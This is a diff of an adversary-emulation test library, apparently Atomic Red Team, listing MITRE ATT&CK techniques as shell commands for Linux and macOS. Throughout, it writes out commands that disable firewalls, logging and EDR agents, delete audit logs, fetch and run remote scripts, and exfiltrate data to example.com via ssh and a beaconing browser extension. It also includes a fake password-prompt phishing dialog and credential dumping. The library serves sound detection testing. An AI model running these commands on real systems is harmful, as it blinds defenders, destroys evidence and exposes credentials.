scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
## Push files to victim using sftp
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
## Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
Linux/Credential_Access/Create_Account.md
+6
View File
@@ -0,0 +1,6 @@
# Create Account
MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
useradd -M -N -r -s /bin/bash -c "Evil Account" evil_user
Linux/Defense_Evasion/Clear_Command_History.md
+22
View File
@@ -0,0 +1,22 @@
# Clear Command History
MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1146)
## multiple shells
unset HISTFILE
export HISTFILESIZE=0
history -c
## bash
rm ~/.bash_history
echo "" > ~/.bash_history
cat /dev/null > ~/.bash_history
ln -sf /dev/null ~/.bash_history
Linux/Defense_Evasion/Disabling_Security_Tools.md
+36
View File
@@ -0,0 +1,36 @@
# Disabling Security Tools
MITRE ATT&CK Technique: [T1089](https://attack.mitre.org/wiki/Technique/T1089)
## Stop and disable firewall on CentOS/RHEL 6 and below
service iptables stop
chkconfig off iptables
service ip6tables stop
chkconfig off ip6tables
## Stop and disable firewall on CentOS/RHEL 7 and above
systemctl stop firewalld
systemctl disable firewalld
## Stop and disable syslog on CentOS/RHEL 6 and below
service rsyslog stop
chkconfig off rsyslog
## Stop and disable syslog on CentOS/RHEL 7 and above
systemctl stop rsyslog
systemctl disable rsyslog
## Stop and disable Cb Response Daemon on CentOS/RHEL 6 and below
service cbdaemon stop
chkconfig off cbdaemon
## Stop and disable Cb Response Daemon on CentOS/RHEL 7 and above
systemctl stop cbdaemon
systemctl disable cbdaemon
## Disable SELinux Enforcement
setenforce 0
Linux/Defense_Evasion/File_Deletion.md
+23
View File
@@ -0,0 +1,23 @@
## File Deletion
MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
### Victim Configuration
echo "This file will be shredded" > /tmp/victim-shred.txt
mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
### Delete a single file
rm -f /tmp/victim-files/a
### Delete an entire folder
rm -rf /tmp/victim-files
### Overwrite and delete a file with shred
shred -u /tmp/victim-shred.txt
Linux/Defense_Evasion/HISTCONTROL.md
+15
View File
@@ -0,0 +1,15 @@
# HISTCONTROL
MITRE ATT&CK Technique: [T1148](https://attack.mitre.org/wiki/Technique/T1148)
### Set the environment variable
export HISTCONTROL=ignoreboth
OR
echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
### Preface commands with a space to exclude them from .bash_history
ls
whoami > recon.txt
Linux/Defense_Evasion/Hidden_Files_and_Directories.md
+22
View File
@@ -0,0 +1,22 @@
# Hidden Files and Directories
MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
To create visible directories and files
mkdir visible-directory
echo "this file is visible" > visible-directory/visible-file
# List the contents the current directory and visible directory
ls
ls visible-directory
To create hidden directories and files
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
# List the contents the current directory and hidden directory
ls -la
ls -la .hidden-directory
Linux/Defense_Evasion/Install_Root_Certificate.md
+20
View File
@@ -0,0 +1,20 @@
# Install Root Certificate
MITRE ATT&CK Technique: [T1130](https://attack.mitre.org/wiki/Technique/T1130)
## Create a root CA with openssl
openssl genrsa -out rootCA.key 4096
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -out rootCA.crt
## Install root CA on CentOS/RHEL 5 and below
cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt
## Install root CA on CentOS/RHEL 6 and above
cp rootCA.crt /etc/pki/ca-trust/source/anchors/
update-ca-trust
## Testing the trusted certificate.
To test the new trust, apply the root certificate or another signed with it to a SSL/TLS web service and attempt a connection with curl or wget.
curl https://art.evil.com
Linux/Defense_Evasion/Rootkits.md
+21
View File
@@ -0,0 +1,21 @@
## Rootkits
MITRE ATT&CK Technique: [T1014](https://attack.mitre.org/wiki/Technique/T1014)
### Loadable Kernel Module based Rootkit
Input:
sudo insmod MODULE.ko
OR
Input:
sudo modprobe MODULE.ko
### LD_PRELOAD based Rootkit
Input:
export LD_PRELOAD=$PWD/libmy_r00tkit.so
Linux/Defense_Evasion/Timestomp.md
+30
View File
@@ -0,0 +1,30 @@
# Timestomp
MITRE ATT&CK Technique: [T1099](https://attack.mitre.org/wiki/Technique/T1099)
### Create a test file to work with
touch testfile
OR
echo "This is only a test" > testfile
### Examine the current timestamp
stat testfile
### Set only the access timestamp
touch -a -t 197001010000.00 testfile
stat testfile
### Set only the modification timestamp
touch -m -t 197001010000.00 testfile
stat testfile
### Setting the creation timestamp requires changing the system clock and reverting.
### Sudo or root privileges are required to change date. Use with caution.
NOW=$(date)
date -s "1970-01-01 00:00:00"
touch testfile
date -s "$NOW"
stat testfile
Linux/Discovery/Account_Discovery.md
+33
View File
@@ -0,0 +1,33 @@
# Account Discovery
MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
List of all accounts:
cat /etc/passwd
View sudoers access (requires root):
cat /etc/sudoers > /tmp/loot.txt
View accounts with UID 0:
grep 'x:0:' /etc/passwd > /tmp/loot.txt
List opened files by user:
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
Currently logged in:
Local:
finger
Remote:
finger @<computer_name>
Show if a user account has ever logged in remotely:
lastlog > /tmp/loot.txt
Linux/Discovery/File_and_Directory_Discovery.md
+19
View File
@@ -0,0 +1,19 @@
#File and Directory Discovery
## MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083)
Output a directory tree listing :
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
List Mounted File Systems and Paths
cat /etc/mtab > /tmp/loot.txt
Find pdfs on a machine
find . -type f -iname *.pdf > /tmp/loot.txt
Find hidden files on a machine
find . -type f -name ".*"
Linux/Discovery/Network_Service_Scanning.md
+9
View File
@@ -0,0 +1,9 @@
## Network Service Scanning
MITRE ATT&CK Technique: [T1046](https://attack.mitre.org/wiki/Technique/T1046)
### Bash One Liner
Input:
for port in {1..65535}; do echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; done
Linux/Discovery/Process_Discovery.md
+14
View File
@@ -0,0 +1,14 @@
## Process Discovery
MITRE ATT&CK Technique: [T1057](https://attack.mitre.org/wiki/Technique/T1057)
### Process Discovery
Input:
ps >> /tmp/loot.txt
Input:
ps aux >> /tmp/loot.txt
Linux/Discovery/Remote_System_Discovery.md
+18
View File
@@ -0,0 +1,18 @@
## Remote System Discovery
MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018)
### arp
Input:
arp -a | grep -v '^?'
### Network scanning
Input:
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
Linux/Discovery/System_Information_Discovery.md
+16
View File
@@ -0,0 +1,16 @@
# System Information Discovery
MITRE ATT&CK Technique: [T1082](https://attack.mitre.org/wiki/Technique/T1082)
List OS information:
uname -a >> /tmp/loot.txt
List OS specific information:
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
Show how long a machine has been running:
uptime >> /tmp/loot.txt
Linux/Discovery/System_Network_Configuration_Discovery.md
+17
View File
@@ -0,0 +1,17 @@
## System Network Configuration Discovery
MITRE ATT&CK Technique: [T1016](https://attack.mitre.org/wiki/Technique/T1016)
### Network Data
Input:
arp -a
Input:
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
Input:
ifconfig
Linux/Execution/Command-Line_Interface.md
+14
View File
@@ -0,0 +1,14 @@
# Command-Line Interface
MITRE ATT&CK Technique: [T1059](https://attack.mitre.org/wiki/Technique/T1059)
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash"
Using Wget for equivalent functionality.
bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash"
This will download the specified payload and set a marker file in `/tmp/art-fish.txt`.
Linux/Execution/Trap.md
+14
View File
@@ -0,0 +1,14 @@
# Trap
MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
exit
After exiting the shell, the script will download and execute.
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' INT
After sending a keyboard interrupt (CTRL+C) the script will download and execute.
Linux/Exfiltration/Data_Compressed.md
+30
View File
@@ -0,0 +1,30 @@
## Data Compressed
MITRE ATT&CK Technique: [T1002](https://attack.mitre.org/wiki/Technique/T1002)
### Victim Configuration
mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
echo "This file will be gzipped" > /tmp/victim-gzip.txt
echo "This file will be tarred" > /tmp/victim-tar.txt
### Compression with zip
zip /tmp/victim-files.zip /tmp/victim-files/*
### Compression with gzip
gzip -f /tmp/victim-gzip.txt
### Compression with tar
Directory
tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/
File
tar -cvzf /tmp/victim-tar.tar.gz
Linux/Exfiltration/Data_Encrypted.md
+20
View File
@@ -0,0 +1,20 @@
## Data Encrypted
MITRE ATT&CK Technique: [T1022](https://attack.mitre.org/wiki/Technique/T1022)
### Victim Configuration
echo "This file will be encrypted" > /tmp/victim-gpg.txt
mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
### Zip and encrypt a directory
zip --password "insert password here" /tmp/victim-files.zip /tmp/victim-files/*
### Encrypt a single file
gpg -c /tmp/victim-gpg.txt
<enter passphrase and confirm>
ls -l
Linux/Exfiltration/Data_Transfer_Size_Limits.md
+13
View File
@@ -0,0 +1,13 @@
## Data Transfer Size Limits
MITRE ATT&CK Technique: [T1030](https://attack.mitre.org/wiki/Technique/T1030)
### Victim Configuration
cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
### Split into 5MB chunks
split -b 5000000 /tmp/victim-whole-file
ls -l
Linux/Exfiltration/Exfiltration_Over_Alternative_Protocol.md
+31
View File
@@ -0,0 +1,31 @@
## Exfiltration Over Alternative Protocol
MITRE ATT&CK Technique: [T1048](https://attack.mitre.org/wiki/Technique/T1048)
### SSH
Remote to Local:
ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
Local to Remote:
tar czpf - /home/* | openssl des3 -salt -pass pass:1234 | ssh foo@example.com 'cat > /home.tar.gz.enc'
### HTTP
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
Victim System Configuration:
mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
Using Python to establish a one-line HTTP server on victim system:
cd /tmp/victim-staging-area
python -m SimpleHTTPServer 1337
To retrieve the data from an adversary system:
wget http://VICTIM_IP:1337/victim-file.txt
Linux/Lateral_Movement/Remote_File_Copy.md
+35
View File
@@ -0,0 +1,35 @@
# Remote File Copy
MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105)
## Adversary System Configuration
### Ensure SSH access has been configured for an adversary account
echo "This file transferred by scp" > /tmp/adversary-scp
echo "This file transferred by sftp" > /tmp/adversary-sftp
mkdir /tmp/adversary-rsync
cd /tmp/adversary-rsync
touch a b c d e f g
## Victim System Configuration
### Ensure SSH access has been configured for a victim account
### Ensure write access for victim account to this directory
mkdir /tmp/victim-files
cd /tmp/victim-files
## Push files to victim using rsync
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
## Pull files from adversary using rsync
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
## Push files to victim using scp
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
## Pull file from adversary using scp
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
## Push files to victim using sftp
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
## Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
Linux/Linux.md
-21
View File
@@ -1,21 +0,0 @@
## MITRE ATT&CK Matrix - Linux
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port |
| Bootkit | Setuid and Setgid | Clear Command History | Brute Force | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | Create Account | Permission Groups Discovery | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Process Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | System Information Discovery | Third-party Software | Space after Filename | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Redundant Access | | HISTCONTROL | Input Capture | System Network Configuration Discovery | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
| Trap | | Hidden Files and Directories | Network Sniffing | System Network Connections Discovery | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| Valid Accounts | | Indicator Removal from Tools | Private Keys | System Owner/User Discovery | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
| | | Install Root Certificate | | | | | | | Multiband Communication |
| | | Masquerading | | | | | | | Multilayer Encryption |
| | | Redundant Access | | | | | | | Remote File Copy |
| | | Scripting | | | | | | | Standard Application Layer Protocol |
| | | Space after Filename | | | | | | | Standard Cryptographic Protocol |
| | | Timestomp | | | | | | | Standard Non-Application Layer Protocol |
| | | Valid Accounts | | | | | | | Uncommonly Used Port |
| | | | | | | | | | Web Service |
Linux/Payloads/Browser_Extension/inline.js
+37
View File
@@ -0,0 +1,37 @@
function exfil(str) {
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
// and probably a thousand other methods. But this one is easy.
var buffer = new TextEncoder("utf-8").encode(str);
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
}
function callUrl(buffer) {
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
// except it's example.com so w/e
var digest = hex(buffer);
var url = "https://example.com/" + digest;
console.log("Exfiltrating data to " + url)
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", url, true);
xmlHttp.send( null);
return digest;
}
function hex(buffer) {
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
var hexCodes = [];
var view = new DataView(buffer);
for (var i = 0; i < view.byteLength; i += 4) {
var value = view.getUint32(i)
var stringValue = value.toString(16)
var padding = '00000000'
var paddedValue = (padding + stringValue).slice(-padding.length)
hexCodes.push(paddedValue);
}
var athing = hexCodes.join("");
return hexCodes.join("");
}
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
var digest = exfil(document.title);
Linux/Payloads/Browser_Extension/manifest.json
+16
View File
@@ -0,0 +1,16 @@
{
"name": "Minimum Viable Malicious Extension",
"description": "Base Level Extension",
"version": "1.0",
"manifest_version": 2,
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": [
"inline.js"
]
}
]
}
Linux/Payloads/echo-art-fish.sh
+2
View File
@@ -0,0 +1,2 @@
#! /bin/bash
echo So long, and thanks for all the fish! > /tmp/art-fish.txt
Linux/Payloads/hello.c
+9
View File
@@ -0,0 +1,9 @@
#import <stdio.h>
#import <unistd.h>
int main()
{
printf("Hello\n");
sleep(60);
printf("Don't run random binaries!\n");
return 0;
}
Linux/Persistence/Browser_Extensions.md
+24
View File
@@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'
Linux/Persistence/Cron_Job.md
+1 -1
View File
@@ -1,4 +1,4 @@
# Bash History
# Cron Job
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
Linux/Persistence/Hidden_Files_and_Directories.md
+22
View File
@@ -0,0 +1,22 @@
# Hidden Files and Directories
MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
To create visible directories and files
mkdir visible-directory
echo "this file is visible" > visible-directory/visible-file
# List the contents the current directory and visible directory
ls
ls visible-directory
To create hidden directories and files
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
# List the contents the current directory and hidden directory
ls -la
ls -la .hidden-directory
Linux/Persistence/Trap.md
+10
View File
@@ -0,0 +1,10 @@
# Trap
MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
exit
After exiting the shell, the script will download and execute.
Linux/Persistence/bash_profile_and_bashrc.md
+6
View File
@@ -0,0 +1,6 @@
# .bash_profile and .bashrc
MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
echo "/path/to/script.py" >> ~/.bash_profile
echo "/path/to/script.py" >> ~/.bashrc
Linux/Privilege_Escalation/Setuid_and_Setgid.md
+15
View File
@@ -0,0 +1,15 @@
# Setuid and Setgid
MITRE ATT&CK Technique: [T1166](https://attack.mitre.org/wiki/Technique/T1166)
Navigate to [hello.c](../Payloads/hello.c)
Input:
make hello
sudo chown root hello
sudo chmod u+s hello
./hello
Linux/README.md
+22
View File
@@ -0,0 +1,22 @@
## MITRE ATT&CK Matrix - Linux
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
| Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media |
| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | [Remote File Copy](Lateral_Movement/Remote_File_Copy.md) | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | [Data Encrypted](Exfiltration/Data_Encrypted.md) | Connection Proxy |
| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | [Data Transfer Size Limits](Exfiltration/Data_Transfer_Size_Limits.md) | Custom Command and Control Protocol |
| [Hidden Files and Directories](Persistence/Hidden_Files_and_Directories.md) | Web Shell | [File Deletion](Defense_Evasion/File_Deletion.md) | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
| Redundant Access | | [Hidden Files and Directories](Defense_Evasion/Hidden_Files_and_Directories.md) | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels |
| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels |
| Web Shell | | [Install Root Certificate](Defense_Evasion/Install_Root_Certificate.md) | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication |
| | | Masquerading | | | | | | | Multilayer Encryption |
| | | Redundant Access |
| | | [Rootkits](Defense_Evasion/Rootkits.md) | | | | | | | [Remote File Copy](Command_and_Control/Remote_File_Copy.md) |
| | | Scripting | | | | | | | Standard Application Layer Protocol |
| | | Space after Filename | | | | | | | Standard Cryptographic Protocol |
| | | [Timestomp](Defense_Evasion/Timestomp.md) | | | | | | | Standard Non-Application Layer Protocol |
| | | Valid Accounts | | | | | | | Uncommonly Used Port |
| | | | | | | | | | Web Service |
Mac/Collection/Browser_Extensions.md
+24
View File
@@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'
Mac/Collection/Screen_Capture.md
+18
View File
@@ -0,0 +1,18 @@
## Screen Capture
MITRE ATT&CK Technique: [T1113](https://attack.mitre.org/wiki/Technique/T1113)
Input:
log show --debug | grep "GENERATED_NEW_IMAGE" | awk '{print $1,$2,$11,$27}'
For list of times a screenshot was generated and extension used
Input:
log show --debug | grep "GENERATED_NEW_IMAGE" | awk '{print $1,$2,$11,$27}' | wc -l
For number count of total images created
Mac/Command_and_Control/Custom_Command_and_Control_Protocol.md
+43
View File
@@ -0,0 +1,43 @@
# Custom Command and Control Protocol
MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1094)
## Communication over Bitbucket Snippets
The use of a legitimate service as transport is a common technique to evade detection by masquerading as the legitimate service.
Below are instructions to run a script to simulate traffic from a malware implant that communicates via a custom protocol implemented in [Bitbucket Snippets](https://confluence.atlassian.com/bitbucket/snippets-719095082.html).
The malware itself isn't included, just the traffic simulation.
### Installation
#### Step 1: Create a new Bitbucket account
We recommend using a fresh account for this so as not to pollute the snippets of your existing account.
https://bitbucket.org/account/signup/
#### Step 2: Include its credentials in `auth.json`
In the directory [Payloads/Custom_Command_and_Control_Protocol_Bitbucket_Snippets](Payloads/Custom_Command_and_Control_Protocol_Bitbucket_Snippets):
```
cp auth.json.template auth.json
```
Edit `auth.json` to include the username, email, and password of the Bitbucket account. `auth.json` should not be added to version control.
### Step 3: Install dependencies
```
pip install -r requirements.txt
```
### Usage
To simulate the network traffic, run:
```
python replay.py
```
You will need to be using Python 3.
This will make requests to `bitbucket.org` urls, recorded from an interactive session with the malware.
The session recording of the malware is available to view and modify at [traffic_history.json](bitbucket_protocol/traffic_history.json)
Mac/Credential_Access/Credentials_in_Files.md
+11
View File
@@ -0,0 +1,11 @@
# Credentials in Files
MITRE ATT&CK Technique: [T1081](https://attack.mitre.org/wiki/Technique/T1081)
## Browser and System credentials
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Input:
python2 laZagne.py all
Mac/Credential_Access/Input_Prompt.md
+12
View File
@@ -0,0 +1,12 @@
# Input Prompt
MITRE ATT&CK Technique: [T1141](https://attack.mitre.org/wiki/Technique/T1141)
### Prompt User for Password (Local Phishing)
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
Reference:
http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
Mac/Credential_Access/Keychain.md
+32
View File
@@ -0,0 +1,32 @@
# Keychain
MITRE ATT&CK Technique: [T1142](https://attack.mitre.org/wiki/Technique/T1142)
### Keychain Files
~/Library/Keychains/
/Library/Keychains/
/Network/Library/Keychains/
### security command line
Input:
security -h
Input:
security find-certificate -a -p > allcerts.pem
Input:
security import /tmp/certs.pem -k
### References
[Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
[Keychain dumper](https://github.com/juuso/keychaindump)
Mac/Defense_Evasion/Clear_Command_History.md
+18
View File
@@ -0,0 +1,18 @@
# Clear Command History
MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1146)
## multiple shells
unset HISTFILE
export HISTFILESIZE=0
history -c
## bash
rm ~/.bash_history
cat /dev/null > ~/.bash_history
Mac/Defense_Evasion/Disabling_Security_Tools.md
+15
View File
@@ -0,0 +1,15 @@
# Disabling Security Tools
MITRE ATT&CK Technique: [T1089](https://attack.mitre.org/wiki/Technique/T1089)
## Disabling By Tool:
### Carbon Black Response
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
### LittleSnitch
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
### OpenDNS Umbrella
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
Mac/Defense_Evasion/Gatekeeper_Bypass.md
+8
View File
@@ -0,0 +1,8 @@
# Gatekeeper Bypass
MITRE ATT&CK Technique: [T1144](https://attack.mitre.org/wiki/Technique/T1144)
sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app
sudo spctl --master-disable
Mac/Defense_Evasion/HISTCONTROL.md
+15
View File
@@ -0,0 +1,15 @@
# HISTCONTROL
MITRE ATT&CK Technique: [T1148](https://attack.mitre.org/wiki/Technique/T1148)
### Set the environment variable
export HISTCONTROL=ignoreboth
OR
echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
### Preface commands with a space to exclude them from .bash_history
ls
whoami > recon.txt
Mac/Defense_Evasion/Hidden_Files_and_Directories.md
+6
View File
@@ -0,0 +1,6 @@
# Hidden Files and Directories
MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
Mac/Defense_Evasion/Hidden_Users.md
+6
View File
@@ -0,0 +1,6 @@
# Hidden Users
MITRE ATT&CK Technique: [T1147](https://attack.mitre.org/wiki/Technique/T1147)
sudo dscl . -create /Users/APT UniqueID 333
Mac/Defense_Evasion/Indicator_Removal_On_Host.md
+9
View File
@@ -0,0 +1,9 @@
# Indicator Removal on Host
MITRE ATT&CK Technique: [T1070](https://attack.mitre.org/wiki/Technique/T1070)
### Delete System Logs
rm -rf /private/var/log/system.log*
### Delete BSM Audit Logs
rm -rf /private/var/audit/*
Mac/Defense_Evasion/Launchctl.md
+6
View File
@@ -0,0 +1,6 @@
# Launchctl
MITRE ATT&CK Technique: [T1152](https://attack.mitre.org/wiki/Technique/T1152)
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
Mac/Defense_Evasion/Space_After_Filename.md
+12
View File
@@ -0,0 +1,12 @@
# Space After Filename
MITRE ATT&CK Technique: [T1151](https://attack.mitre.org/wiki/Technique/T1151)
### Generate Binary
echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
### Add Space After Filename
mv execute.txt "execute.txt "
### Execute
./execute.txt\
Mac/Discovery/Account_Discovery.md
+33
View File
@@ -0,0 +1,33 @@
## Account Discovery
